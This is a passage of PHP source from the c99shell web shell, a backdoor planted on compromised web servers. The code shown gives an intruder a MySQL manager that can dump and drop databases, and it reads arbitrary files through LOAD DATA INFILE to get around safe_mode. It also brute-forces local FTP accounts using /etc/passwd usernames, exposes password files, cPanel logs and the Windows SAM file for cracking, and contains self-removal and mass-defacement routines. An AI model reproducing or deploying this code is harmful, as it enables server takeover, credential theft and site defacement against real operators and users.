  620. if (substr($d,strlen($d)-1,1) != "/") {$d .= "/";}
  621. $dispd = htmlspecialchars($d);
  622. $pd = $e = explode("/",substr($d,0,strlen($d)-1));
  623. $i = 0;
  624. echo "<b>Directory: </b>";
  625. foreach($pd as $b)
  626. {
  627.  $t = "";
  628.  reset($e);
  629.  $j = 0;
  630.  foreach ($e as $r)
  631.  {
  632.   $t.= $r."/";
  633.   if ($j == $i) {break;}
  634.   $j++;
  635.  }
  636.  echo "<a href=\"".$surl."act=ls&d=".urlencode(htmlspecialchars($t))."/&sort=".$sort."\"><b>".htmlspecialchars($b)."/</b></a>";
  637.  $i++;
  638. }
  639. echo "&nbsp;&nbsp;&nbsp;";
  640. if (is_writable($d))
  641. {
  642.  $wd = true;
  643.  $wdt = "<font color=\"green\">[ ok ]</font>";
  644.  echo "<b><font color=\"green\">".view_perms(fileperms($d))."</font></b>";
  645. }
  646. else
  647. {
  648.  $wd = false;
  649.  $wdt = "<font color=\"red\">[ Read-Only ]</font>";
  650.  echo "<b><font color=\"red\">".view_perms(fileperms($d.$f))."</font></b>";
  651. }
  652. $free = diskfreespace($d);
  653. if (!$free) {$free = 0;}
  654. $all = disk_total_space($d);
  655. if (!$all) {$all = 0;}
  656. $used = $all-$free;
  657. $used_percent = round(100/($all/$free),2);
  658. echo "<br><b>Free ".view_size($free)." of ".view_size($all)." (".$used_percent."%)</b><br>";
  659. if (count($quicklaunch) > 0)
  660. {
  661.  foreach($quicklaunch as $item)
  662.  {
  663.   $item[1] = str_replace("%d",urlencode($d),$item[1]);
  664.   $item[1] = str_replace("%upd",urlencode(realpath($d."..")),$item[1]);
  665.   echo "<a href=\"".$item[1]."\"><u>".$item[0]."</u></a>&nbsp;&nbsp;&nbsp;&nbsp;";
  666.  }
  667. }
  668. $letters = "";
  669. if ($win)
  670. {
  671.  $abc = array("c", "d", "e", "f", "g", "h", "i", "j", "k", "l", "m", "o", "p", "q", "n", "r", "s", "t", "v", "u", "w", "x", "y", "z");
  672.  $v = explode("/",$d);
  673.  $v = $v[0];
  674.  foreach ($abc as $letter)
  675.  {
  676.   if (is_dir($letter.":/"))
  677.   {
  678.    if ($letter.":" != $v) {$letters .= "<a href=\"".$surl."act=ls&d=".$letter.":\">[ ".$letter." ]</a> ";}
  679.    else {$letters .= "<a href=\"".$surl."act=ls&d=".$letter.":\">[ <font color=\"green\">".$letter."</font> ]</a> ";}
  680.   }
  681.  }
  682.  if (!empty($letters)) {echo "<br><b>Detected drives</b>: ".$letters;}
  683. }
  684. ?></p></td></tr></table><br><?php
  685. if ((!empty($donated_html)) and (in_array($act,$donated_act)))
  686. {
  687.  ?><TABLE style="BORDER-COLLAPSE: collapse" cellSpacing=0 borderColorDark=#666666 cellPadding=5 width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1><tr><td width="100%" valign="top"><?php echo $donated_html; ?></td></tr></table><br><?php
  688. }
  689. ?><TABLE style="BORDER-COLLAPSE: collapse" cellSpacing=0 borderColorDark=#666666 cellPadding=5 width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1><tr><td width="100%" valign="top"><?php
  690. if ($act == "") {$act = $dspact = "ls";}
  691. if ($act == "sql")
  692. {
  693.  $sql_surl = $surl."act=sql";
  694.  if ($sql_login)  {$sql_surl .= "&sql_login=".htmlspecialchars($sql_login);}
  695.  if ($sql_passwd) {$sql_surl .= "&sql_passwd=".htmlspecialchars($sql_passwd);}
  696.  if ($sql_server) {$sql_surl .= "&sql_server=".htmlspecialchars($sql_server);}
  697.  if ($sql_port)   {$sql_surl .= "&sql_port=".htmlspecialchars($sql_port);}
  698.  if ($sql_db)     {$sql_surl .= "&sql_db=".htmlspecialchars($sql_db);}
  699.  $sql_surl .= "&";
  700.  ?><TABLE style="BORDER-COLLAPSE: collapse" height=1 cellSpacing=0 borderColorDark=#666666 cellPadding=5 width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1 bordercolor="#C0C0C0"><tr><td width="100%" height="1" colspan="2" valign="top"><center><?php
  701.  if ($sql_server)
  702.  {
  703.   $sql_sock = mysql_connect($sql_server.":".$sql_port, $sql_login, $sql_passwd);
  704.   $err = mysql_error();
  705.   @mysql_select_db($sql_db,$sql_sock);
  706.   if ($sql_query and $submit) {$sql_query_result = mysql_query($sql_query,$sql_sock); $sql_query_error = mysql_error();}
  707.  }
  708.  else {$sql_sock = false;}
  709.  echo "<b>SQL Manager:</b><br>";
  710.  if (!$sql_sock)
  711.  {
  712.   if (!$sql_server) {echo "NO CONNECTION";}
  713.   else {echo "<center><b>Can't connect</b></center>"; echo "<b>".$err."</b>";}
  714.  }
  715.  else
  716.  {
  717.   $sqlquicklaunch = array();
  718.   $sqlquicklaunch[] = array("Index",$surl."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&");
  719.   if (!$sql_db) {$sqlquicklaunch[] = array("Query","#\" onclick=\"alert('Please, select DB!')");}
  720.   else {$sqlquicklaunch[] = array("Query",$sql_surl."sql_act=query");}
  721.   $sqlquicklaunch[] = array("Server-status",$surl."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&sql_act=serverstatus");
  722.   $sqlquicklaunch[] = array("Server variables",$surl."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&sql_act=servervars");
  723.   $sqlquicklaunch[] = array("Processes",$surl."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&sql_act=processes");
  724.   $sqlquicklaunch[] = array("Logout",$surl."act=sql");
  725.  
  726.   echo "<center><b>MySQL ".mysql_get_server_info()." (proto v.".mysql_get_proto_info ().") running in ".htmlspecialchars($sql_server).":".htmlspecialchars($sql_port)." as ".htmlspecialchars($sql_login)."@".htmlspecialchars($sql_server)." (password - \"".htmlspecialchars($sql_passwd)."\")</b><br>";
  727.  
  728.   if (count($sqlquicklaunch) > 0) {foreach($sqlquicklaunch as $item) {echo "[ <a href=\"".$item[1]."\"><u>".$item[0]."</u></a> ] ";}}
  729.   echo "</center>";
  730.  }
  731.  echo "</td></tr><tr>";
  732.  if (!$sql_sock) {?><td width="28%" height="100" valign="top"><center><font size="5"> i </font></center><li>If login is null, login is owner of process.<li>If host is null, host is localhost</b><li>If port is null, port is 3306 (default)</td><td width="90%" height="1" valign="top"><TABLE height=1 cellSpacing=0 cellPadding=0 width="100%" border=0><tr><td>&nbsp;<b>Please, fill the form:</b><table><tr><td>Username</td><td align=right>Password&nbsp;</td></tr><form><input type="hidden" name="act" value="sql"><tr><td><input type="text" name="sql_login" value="root" maxlength="64"></td><td align=right><input type="password" name="sql_passwd" value="" maxlength="64"></td></tr><tr><td>HOST</td><td>PORT</td></tr><tr><td><input type="text" name="sql_server" value="localhost" maxlength="64"></td><td><input type="text" name="sql_port" value="3306" maxlength="6" size="3"><input type="submit" value="Connect"></td></tr><tr><td></td></tr></form></table></td><?php }
  733.  else
  734.  {
  735.   //Start left panel
  736.   if (!empty($sql_db))
  737.   {
  738.    ?><td width="25%" height="100%" valign="top"><a href="<?php echo $surl."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&"; ?>"><b>Home</b></a><hr size="1" noshade><?php
  739.    $result = mysql_list_tables($sql_db);
  740.    if (!$result) {echo mysql_error();}
  741.    else
  742.    {
  743.     echo "---[ <a href=\"".$sql_surl."&\"><b>".htmlspecialchars($sql_db)."</b></a> ]---<br>";
  744.     $c = 0;
  745.     while ($row = mysql_fetch_array($result)) {$count = mysql_query ("SELECT COUNT(*) FROM $row[0]"); $count_row = mysql_fetch_array($count); echo "<b>�&nbsp;<a href=\"".$sql_surl."sql_db=".htmlspecialchars($sql_db)."&sql_tbl=".htmlspecialchars($row[0])."\"><b>".htmlspecialchars($row[0])."</b></a> (".$count_row[0].")</br></b>
  746. "; mysql_free_result($count); $c++;}
  747.     if (!$c) {echo "No tables found in database.";}
  748.    }
  749.   }
  750.   else
  751.   {
  752.    ?><td width="1" height="100" valign="top"><a href="<?php echo $sql_surl; ?>"><b>Home</b></a><hr size="1" noshade><?php
  753.    $result = mysql_list_dbs($sql_sock);
  754.    if (!$result) {echo mysql_error();}
  755.    else
  756.    {
  757.     ?><form action="<?php echo $surl; ?>"><input type="hidden" name="act" value="sql"><input type="hidden" name="sql_login" value="<?php echo htmlspecialchars($sql_login); ?>"><input type="hidden" name="sql_passwd" value="<?php echo htmlspecialchars($sql_passwd); ?>"><input type="hidden" name="sql_server" value="<?php echo htmlspecialchars($sql_server); ?>"><input type="hidden" name="sql_port" value="<?php echo htmlspecialchars($sql_port); ?>"><select name="sql_db"><?php
  758.     echo "<option value=\"\">Databases (...)</option>
  759. ";
  760.     $c = 0;
  761.     while ($row = mysql_fetch_row($result)) {echo "<option value=\"".$row[0]."\""; if ($sql_db == $row[0]) {echo " selected";} echo ">".$row[0]."</option>
  762. "; $c++;}
  763.    }
  764.    ?></select><hr size="1" noshade>Please, select database<hr size="1" noshade><input type="submit" value="Go"></form><?php
  765.   }
  766.   //End left panel
  767.   echo "</td><td width=\"100%\" height=\"1\" valign=\"top\">";
  768.   //Start center panel
  769.   if ($sql_db)
  770.   {
  771.    echo "<center><b>There are ".$c." tables in this DB (".htmlspecialchars($sql_db).").<br>";
  772.    if (count($dbquicklaunch) > 0) {foreach($dbsqlquicklaunch as $item) {echo "[ <a href=\"".$item[1]."\"><u>".$item[0]."</u></a> ] ";}}
  773.    echo "</b></center>";
  774.  
  775.    $acts = array("","dump");
  776.  
  777.    if ($sql_act == "query")
  778.    {
  779.     echo "<hr size=\"1\" noshade>";
  780.     if ($submit)
  781.     {
  782.      if ((!$sql_query_result) and ($sql_confirm)) {if (!$sql_query_error) {$sql_query_error = "Query was empty";} echo "<b>Error:</b> <br>".$sql_query_error."<br>";}
  783.     }
  784.     if ($sql_query_result or (!$sql_confirm)) {$sql_act = $sql_goto;}
  785.     if ((!$submit) or ($sql_act)) {echo "<form method=\"POST\"><b>"; if (($sql_query) and (!$submit)) {echo "Do you really want to  :";} else {echo "SQL-Query :";} echo "</b><br><br><textarea name=\"sql_query\" cols=\"60\" rows=\"10\">".htmlspecialchars($sql_query)."</textarea><br><br><input type=\"hidden\" name=\"submit\" value=\"1\"><input type=\"hidden\" name=\"sql_goto\" value=\"".htmlspecialchars($sql_goto)."\"><input type=\"submit\" name=\"sql_confirm\" value=\"Yes\">&nbsp;<input type=\"submit\" value=\"No\"></form>";}
  786.    }
  787.    if (in_array($sql_act,$acts))
  788.    {
  789.     ?><table border="0" width="100%" height="1"><tr><td width="30%" height="1"><b>Create new table:</b><form action="<?php echo $surl; ?>"><input type="hidden" name="act" value="sql"><input type="hidden" name="sql_act" value="newtbl"><input type="hidden" name="sql_db" value="<?php echo htmlspecialchars($sql_db); ?>"><input type="hidden" name="sql_login" value="<?php echo htmlspecialchars($sql_login); ?>"><input type="hidden" name="sql_passwd" value="<?php echo htmlspecialchars($sql_passwd); ?>"><input type="hidden" name="sql_server" value="<?php echo htmlspecialchars($sql_server); ?>"><input type="hidden" name="sql_port" value="<?php echo htmlspecialchars($sql_port); ?>"><input type="text" name="sql_newtbl" size="20">&nbsp;<input type="submit" value="Create"></form></td><td width="30%" height="1"><b>SQL-Dump DB:</b><form action="<?php echo $surl; ?>"><input type="hidden" name="act" value="sql"><input type="hidden" name="sql_act" value="dump"><input type="hidden" name="sql_db" value="<?php echo htmlspecialchars($sql_db); ?>"><input type="hidden" name="sql_login" value="<?php echo htmlspecialchars($sql_login); ?>"><input type="hidden" name="sql_passwd" value="<?php echo htmlspecialchars($sql_passwd); ?>"><input type="hidden" name="sql_server" value="<?php echo htmlspecialchars($sql_server); ?>"><input type="hidden" name="sql_port" value="<?php echo htmlspecialchars($sql_port); ?>"><input type="text" name="dump_file" size="30" value="<?php echo "dump_".$SERVER_NAME."_".$sql_db."_".date("d-m-Y-H-i-s").".sql"; ?>">&nbsp;<input type="submit" name=\"submit\" value="Dump"></form></td><td width="30%" height="1"></td></tr><tr><td width="30%" height="1"></td><td width="30%" height="1"></td><td width="30%" height="1"></td></tr></table><?php
  790.     if (!empty($sql_act)) {echo "<hr size=\"1\" noshade>";}
  791.     if ($sql_act == "newtpl")
  792.     {
  793.      echo "<b>";
  794.      if ((mysql_create_db ($sql_newdb)) and (!empty($sql_newdb))) {echo "DB \"".htmlspecialchars($sql_newdb)."\" has been created with success!</b><br>";
  795.     }
  796.     else {echo "Can't create DB \"".htmlspecialchars($sql_newdb)."\".<br>Reason:</b> ".mysql_error();}
  797.    }
  798.    elseif ($sql_act == "dump")
  799.    {
  800.     $set = array();
  801.     $set["sock"] = $sql_sock;
  802.     $set["db"] = $sql_db;
  803.     $dump_out = "print";              
  804.     if ($dump_out == "print") {$set["print"] = 1; $set["nl2br"] = 1;}
  805.     elseif ($dump_out == "download")
  806.     {
  807.      @ob_clean();
  808.      header("Content-type: c99shell");
  809.      header("Content-disposition: attachment; filename=\"".$f."\";");
  810.      $set["print"] = 1;
  811.      $set["nl2br"] = 1;
  812.     }
  813.     $set["file"] = $dump_file;
  814.     $set["add_drop"] = true;
  815.     $ret = mysql_dump($set);
  816.     if ($dump_out == "download") {exit;}
  817.    }
  818.    else
  819.    {
  820.     $result = mysql_query("SHOW TABLE STATUS", $sql_sock) or print(mysql_error());
  821.     echo "<br><form method=\"POST\"><TABLE cellSpacing=0 cellPadding=1 bgColor=#333333 borderColorLight=#333333 border=1>";
  822.     echo "<tr>";
  823.     echo "<td><input type=\"checkbox\" name=\"boxtbl_all\" value=\"1\"></td>";
  824.     echo "<td><center><b>Table</b></center></td>";
  825.     echo "<td><b>Rows</b></td>";
  826.     echo "<td><b>Type</b></td>";
  827.     echo "<td><b>Created</b></td>";
  828.     echo "<td><b>Modified</b></td>";
  829.     echo "<td><b>Size</b></td>";
  830.     echo "<td><b>Action</b></td>";
  831.     echo "</tr>";
  832.     $i = 0;
  833.     $tsize = $trows = 0;
  834.     while ($row = mysql_fetch_array($result, MYSQL_NUM))
  835.     {
  836.      $tsize += $row["5"];
  837.      $trows += $row["5"];
  838.      $size = view_size($row["5"]);
  839.      echo "<tr>";
  840.      echo "<td><input type=\"checkbox\" name=\"boxtbl[]\" value=\"".$row[0]."\"></td>";
  841.      echo "<td>&nbsp;<a href=\"".$sql_surl."sql_db=".htmlspecialchars($sql_db)."&sql_tbl=".htmlspecialchars($row[0])."\"><b>".$row[0]."</b></a>&nbsp;</td>";
  842.      echo "<td>".$row[3]."</td>";
  843.      echo "<td>".$row[1]."</td>";
  844.      echo "<td>".$row[10]."</td>";
  845.      echo "<td>".$row[11]."</td>";
  846.      echo "<td>".$size."</td>";
  847.      echo "<td>
  848. &nbsp;<a href=\"".$sql_surl."sql_act=query&sql_query=".urlencode("DELETE FROM `".$row[0]."`")."\"><img src=\"".$surl."act=img&img=sql_button_empty\" height=\"13\" width=\"11\" border=\"0\"></a>
  849. &nbsp;<a href=\"".$sql_surl."sql_act=query&sql_query=".urlencode("DROP TABLE `".$row[0]."`")."\"><img src=\"".$surl."act=img&img=sql_button_drop\" height=\"13\" width=\"11\" border=\"0\"></a>
  850. <a href=\"".$sql_surl."sql_act=query&sql_query=".urlencode("DROP TABLE `".$row[0]."`")."\"><img src=\"".$surl."act=img&img=sql_button_insert\" height=\"13\" width=\"11\" border=\"0\"></a>&nbsp;
  851. </td>";
  852.      echo "</tr>";
  853.      $i++;
  854.     }
  855.     echo "<tr bgcolor=\"000000\">";
  856.     echo "<td><center><b>�</b></center></td>";
  857.     echo "<td><center><b>".$i." table(s)</b></center></td>";
  858.     echo "<td><b>".$trows."</b></td>";
  859.     echo "<td>".$row[1]."</td>";
  860.     echo "<td>".$row[10]."</td>";
  861.     echo "<td>".$row[11]."</td>";
  862.     echo "<td><b>".view_size($tsize)."</b></td>";
  863.     echo "<td></td>";
  864.     echo "</tr>";
  865.     echo "</table><hr size=\"1\" noshade><img src=\"".$surl."act=img&img=arrow_ltr\" border=\"0\"><select name=\"actselect\">
  866. <option>With selected:</option>
  867. <option value=\"drop\" >Drop</option>
  868. <option value=\"empty\" >Empty</option>
  869. <option value=\"chk\">Check table</option>
  870. <option value=\"Optimize table\">Optimize table</option>
  871. <option value=\"Repair table\">Repair table</option>
  872. <option value=\"Analyze table\">Analyze table</option>
  873. </select>&nbsp;<input type=\"submit\" value=\"Confirm\"></form>";
  874.     mysql_free_result($result);
  875.    }
  876.   }
  877.   }
  878.   else
  879.   {
  880.    $acts = array("","newdb","serverstat","servervars","processes","getfile");
  881.    if (in_array($sql_act,$acts))
  882.    {
  883.     ?><table border="0" width="100%" height="1"><tr><td width="30%" height="1"><b>Create new DB:</b><form action="<?php echo $surl; ?>"><input type="hidden" name="act" value="sql"><input type="hidden" name="sql_act" value="newdb"><input type="hidden" name="sql_login" value="<?php echo htmlspecialchars($sql_login); ?>"><input type="hidden" name="sql_passwd" value="<?php echo htmlspecialchars($sql_passwd); ?>"><input type="hidden" name="sql_server" value="<?php echo htmlspecialchars($sql_server); ?>"><input type="hidden" name="sql_port" value="<?php echo htmlspecialchars($sql_port); ?>"><input type="text" name="sql_newdb" size="20">&nbsp;<input type="submit" value="Create"></form></td><td width="30%" height="1"><b>View File:</b><form action="<?php echo $surl; ?>"><input type="hidden" name="act" value="sql"><input type="hidden" name="sql_act" value="getfile"><input type="hidden" name="sql_login" value="<?php echo htmlspecialchars($sql_login); ?>"><input type="hidden" name="sql_passwd" value="<?php echo htmlspecialchars($sql_passwd); ?>"><input type="hidden" name="sql_server" value="<?php echo htmlspecialchars($sql_server); ?>"><input type="hidden" name="sql_port" value="<?php echo htmlspecialchars($sql_port); ?>"><input type="text" name="sql_getfile" size="30" value="<?php echo htmlspecialchars($sql_getfile); ?>">&nbsp;<input type="submit" value="Get"></form></td><td width="30%" height="1"></td></tr><tr><td width="30%" height="1"></td><td width="30%" height="1"></td><td width="30%" height="1"></td></tr></table><?php
  884.    }
  885.    if (!empty($sql_act))
  886.    {
  887.     echo "<hr size=\"1\" noshade>";
  888.     if ($sql_act == "newdb")
  889.     {
  890.      echo "<b>";
  891.      if ((mysql_create_db ($sql_newdb)) and (!empty($sql_newdb))) {echo "DB \"".htmlspecialchars($sql_newdb)."\" has been created with success!</b><br>";}
  892.      else {echo "Can't create DB \"".htmlspecialchars($sql_newdb)."\".<br>Reason:</b> ".mysql_error();}
  893.     }
  894.     if ($sql_act == "serverstatus")
  895.     {
  896.      $result = mysql_query("SHOW STATUS", $sql_sock);
  897.      echo "<center><b>Server-status variables:</b><br><br>";
  898.      echo "<TABLE cellSpacing=0 cellPadding=0 bgColor=#333333 borderColorLight=#333333 border=1><td><b>Name</b></td><td><b>value</b></td></tr>";
  899.      while ($row = mysql_fetch_array($result, MYSQL_NUM)) {echo "<tr><td>".$row[0]."</td><td>".$row[1]."</td></tr>";}
  900.      echo "</table></center>";
  901.      mysql_free_result($result);
  902.     }
  903.     if ($sql_act == "servervars")
  904.     {
  905.      $result = mysql_query("SHOW VARIABLES", $sql_sock);
  906.      echo "<center><b>Server variables:</b><br><br>";
  907.      echo "<TABLE cellSpacing=0 cellPadding=0 bgColor=#333333 borderColorLight=#333333 border=1><td><b>Name</b></td><td><b>value</b></td></tr>";
  908.      while ($row = mysql_fetch_array($result, MYSQL_NUM)) {echo "<tr><td>".$row[0]."</td><td>".$row[1]."</td></tr>";}
  909.      echo "</table>";
  910.      mysql_free_result($result);
  911.     }
  912.     if ($sql_act == "processes")
  913.     {
  914.      if (!empty($kill)) {$query = 'KILL ' . $kill . ';'; $result = mysql_query($query, $sql_sock); echo "<b>Killing process #".$kill."... ok. he is dead, amen.</b>";}
  915.      $result = mysql_query("SHOW PROCESSLIST", $sql_sock);
  916.      echo "<center><b>Processes:</b><br><br>";
  917.      echo "<TABLE cellSpacing=0 cellPadding=2 bgColor=#333333 borderColorLight=#333333 border=1><td><b>ID</b></td><td><b>USER</b></td><td><b>HOST</b></td><td><b>DB</b></td><td><b>COMMAND</b></td><td><b>TIME</b></td><td>STATE</td><td><b>INFO</b></td><td><b>Action</b></td></tr>";
  918.      while ($row = mysql_fetch_array($result, MYSQL_NUM)) { echo "<tr><td>".$row[0]."</td><td>".$row[1]."</td><td>".$row[2]."</td><td>".$row[3]."</td><td>".$row[4]."</td><td>".$row[5]."</td><td>".$row[6]."</td><td>".$row[7]."</td><td><a href=\"".$sql_surl."sql_act=processes&kill=".$row[0]."\"><u>Kill</u></a></td></tr>";}
  919.      echo "</table>";
  920.      mysql_free_result($result);
  921.     }
  922.     elseif (($sql_act == "getfile"))
  923.     {
  924.      if (!mysql_create_db("tmp_bd")) {echo mysql_error();}
  925.      elseif (!mysql_select_db("tmp_bd")) {echo mysql_error();}
  926.      elseif (!mysql_query('CREATE TABLE `tmp_file` ( `Viewing the file in safe_mode+open_basedir` LONGBLOB NOT NULL );')) {echo mysql_error();}
  927.      else {mysql_query("LOAD DATA INFILE \"".addslashes($sql_getfile)."\" INTO TABLE tmp_file"); $query = "SELECT * FROM tmp_file"; $result = mysql_query($query); if (!$result) {echo "Error in query \"".$query."\": ".mysql_error();}
  928.      else
  929.      {
  930.       for ($i=0;$i<mysql_num_fields($result);$i++) {$name = mysql_field_name($result,$i);}
  931.       $f = "";
  932.       while ($line = mysql_fetch_array($result, MYSQL_ASSOC)) {foreach ($line as $key =>$col_value) {$f .= $col_value;}}
  933.       if (empty($f)) {echo "<b>File \"".$sql_getfile."\" does not exists or empty!</b>";}
  934.       else {echo "<b>File \"".$sql_getfile."\":</b><br>".nl2br(htmlspecialchars($f));}
  935.      }
  936.      mysql_free_result($result);
  937.      if (!mysql_drop_db("tmp_bd")) {echo ("Can't drop tempory DB \"tmp_bd\"!");}
  938.      }
  939.     }
  940.    }
  941.   }
  942.  }
  943.  echo "</tr></table></table>";
  944. }
  945. if ($act == "mkdir")
  946. {
  947.  if ($mkdir != $d) {if (file_exists($mkdir)) {echo "<b>Make Dir \"".htmlspecialchars($mkdir)."\"</b>: object alredy exists";} elseif (!mkdir($mkdir)) {echo "<b>Make Dir \"".htmlspecialchars($mkdir)."\"</b>: access denied";}}
  948.  echo "<br><br>";
  949.  $act = $dspact = "ls";
  950. }
  951. if ($act == "ftpquickbrute")
  952. {
  953.  echo "<b>Ftp Quick brute:</b><br>";
  954.  if ($win) {echo "This functions not work in Windows!<br><br>";}
  955.  else
  956.  {
  957.   function c99ftpbrutecheck($host,$port,$timeout,$login,$pass,$sh,$fqb_onlywithsh)
  958.   {
  959.    if ($fqb_onlywithsh)
  960.    {
  961.     if (!in_array($sh,array("/bin/bash","/bin/sh","/usr/local/cpanel/bin/jailshell"))) {$true = false;}
  962.     else {$true = true;}
  963.    }
  964.    else {$true = true;}
  965.    if ($true)
  966.    {
  967.     $sock = @ftp_connect($host,$port,$timeout);
  968.     if (@ftp_login($sock,$login,$pass))
  969.     {
  970.      echo "<a href=\"ftp://".$login.":".$pass."@".$host."\" target=\"_blank\"><b>Connected to ".$host." with login \"".$login."\" and password \"".$pass."\"</b></a>.<br>";
  971.      ob_flush();
  972.      return true;
  973.     }
  974.    }
  975.   }
  976.   if (!empty($submit))
  977.   {
  978.    if (!is_numeric($fqb_lenght)) {$fqb_lenght = $nixpwdperpage;}
  979.    $fp = fopen("/etc/passwd","r");
  980.    if (!$fp) {echo "Can't get /etc/passwd for password-list.";}
  981.    else
  982.    {
  983.     ob_flush();
  984.     $i = $success = 0;
  985.     $ftpquick_st = getmicrotime();
  986.     while(!feof($fp))
  987.     {
  988.      $str = explode(":",fgets($fp,2048));
  989.      if (c99ftpbrutecheck("localhost",21,1,$str[0],$str[0],$str[6],$fqb_onlywithsh))
  990.      {
  991.       $success++;
  992.      }
  993.      if ($i > $fqb_lenght) {break;}
  994.      $i++;
  995.     }
  996.     if ($success == 0) {echo "No success. connections!";}
  997.     $ftpquick_t = round(getmicrotime()-$ftpquick_st,4);
  998.     echo "<hr size=\"1\" noshade><b>Done!<br>Total time (secs.): ".$ftpquick_t."<br>Total connections: ".$i."<br>Success.: <font color=\"green\"><b>".$success."</b></font><br>Unsuccess.:".($i-$success)."</b><br><b>Connects per second: ".round($i/$ftpquick_t,2)."</b><br>";
  999.    }
  1000.   }
  1001.   else {echo "<form method=\"POST\"><br>Read first: <input type=\"text\" name=\"fqb_lenght\" value=\"".$nixpwdperpage."\"><br><br>Users only with shell?&nbsp;<input type=\"checkbox\" name=\"fqb_onlywithsh\" value=\"1\"><br><br><input type=\"submit\" name=\"submit\" value=\"Brute\"></form>";}
  1002.  }
  1003. }
  1004. if ($act == "lsa")
  1005. {
  1006.  echo "<center><b>Server security information:</b></center>";
  1007.  echo "<b>Software:</b> ".PHP_OS.", ".$SERVER_SOFTWARE."<br>";
  1008.  echo "<b>Safe-Mode: ".$hsafemode."</b><br>";
  1009.  echo "<b>Open base dir: ".$hopenbasedir."</b><br>";
  1010.  if (!$win)
  1011.  {
  1012.   if ($nixpasswd)
  1013.   {
  1014.    if ($nixpasswd == 1) {$nixpasswd = 0;}
  1015.    $num = $nixpasswd + $nixpwdperpage;
  1016.    echo "<b>*nix /etc/passwd:</b><br>";
  1017.    $i = $nixpasswd;
  1018.    while ($i < $num)
  1019.    {
  1020.     $uid = posix_getpwuid($i);
  1021.     if ($uid) {echo join(":",$uid)."<br>";}
  1022.     $i++;
  1023.    }
  1024.   }
  1025.   else {echo "<br><a href=\"".$surl."act=lsa&nixpasswd=1&d=".$ud."\"><b><u>Get /etc/passwd</u></b></a><br>";}
  1026.   if (file_get_contents("/etc/userdomains")) {echo "<b><font color=\"green\"><a href=\"".$surl."act=f&f=userdomains&d=/etc/&ft=txt\"><u><b>View cpanel user-domains logs</b></u></a></font></b><br>";}
  1027.   if (file_get_contents("/var/cpanel/accounting.log")) {echo "<b><font color=\"green\"><a href=\"".$surl."act=f&f=accounting.log&d=/var/cpanel/&ft=txt\"><u><b>View cpanel logs</b></u></a></font></b><br>";}
  1028.   if (file_get_contents("/usr/local/apache/conf/httpd.conf")) {echo "<b><font color=\"green\"><a href=\"".$surl."act=f&f=httpd.conf&d=/usr/local/apache/conf/&ft=txt\"><u><b>Apache configuration (httpd.conf)</b></u></a></font></b><br>";}
  1029.   if (file_get_contents("/etc/httpd.conf")) {echo "<b><font color=\"green\"><a href=\"".$surl."act=f&f=httpd.conf&d=/etc/&ft=txt\"><u><b>Apache configuration (httpd.conf)</b></u></a></font></b><br>";}
  1030.  }
  1031.  else
  1032.  {
  1033.   $v = $_SERVER["WINDIR"]."\repair\sam";
  1034.   if (file_get_contents($v)) {echo "<b><font color=\"red\">You can't crack winnt passwords(".$v.") </font></b><br>";}
  1035.   else {echo "<b><font color=\"green\">You can crack winnt passwords. <a href=\"".$surl."act=f&f=sam&d=".$_SERVER["WINDIR"]."\\repair&ft=download\"><u><b>Download</b></u></a>, and use lcp.crack+.</font></b><br>";}
  1036.  }
  1037. }
  1038. if ($act == "mkfile")
  1039. {
  1040.  if ($mkfile != $d)
  1041.  {
  1042.   if (file_exists($mkfile)) {echo "<b>Make File \"".htmlspecialchars($mkfile)."\"</b>: object alredy exists";}
  1043.   elseif (!fopen($mkfile,"w")) {echo "<b>Make File \"".htmlspecialchars($mkfile)."\"</b>: access denied";}
  1044.   else {$act = "f"; $d = dirname($mkfile); if (substr($d,strlen($d)-1,1) != "/") {$d .= "/";} $f = basename($mkfile);}
  1045.  }
  1046.  else {$act = $dspact = "ls";}
  1047. }
  1048. if ($act == "fsbuff")
  1049. {
  1050.  $arr_copy = $sess_data["copy"];
  1051.  $arr_cut = $sess_data["cut"];
  1052.  $arr = array_merge($arr_copy,$arr_cut);
  1053.  if (count($arr) == 0) {echo "<center><b>Buffer is empty!</b></center>";}
  1054.  else
  1055.  {
  1056.   echo "<b>File-System buffer</b><br><br>";
  1057.   $ls_arr = $arr;
  1058.   $disp_fullpath = true;
  1059.   $act = "ls";
  1060.  }
  1061. }
  1062. if ($act == "selfremove")
  1063. {
  1064.  if (!empty($submit))
  1065.  {
  1066.   if (unlink(__FILE__)) {@ob_clean(); echo "Thanks for using c99shell v.".$shver."!"; exit; }
  1067.   else {echo "<center><b>Can't delete ".__FILE__."!</b></center>";}
  1068.  }
  1069.  else
  1070.  {
  1071.   $v = array();
  1072.   for($i=0;$i<8;$i++) {$v[] = "<a href=\"".$surl."\"><u><b>NO</b></u></a>";}
  1073.   $v[] = "<a href=\"#\" onclick=\"if (confirm('Are you sure?')) document.location='".$surl."act=selfremove&submit=1';\"><u>YES</u></a>";
  1074.   shuffle($v);
  1075.   $v = join("&nbsp;&nbsp;&nbsp;",$v);
  1076.   echo "<b>Self-remove: ".__FILE__." <br>Are you sure?</b><center>".$v."</center>";
  1077.  }
  1078. }
  1079. if ($act == "massdeface")
  1080. {
  1081.  if (empty($deface_in)) {$deface_in = $d;}
  1082.  if (empty($deface_name)) {$deface_name = "(.*)"; $deface_name_regexp = 1;}
  1083.  if (empty($deface_text_wwo)) {$deface_text_regexp = 0;}
  1084.  
  1085.  if (!empty($submit))
  1086.  {
  1087.   $found = array();
  1088.   $found_d = 0;
  1089.   $found_f = 0;
  1090.  
  1091.   $text = $deface_text;
  1092.   $text_regexp = $deface_text_regexp;
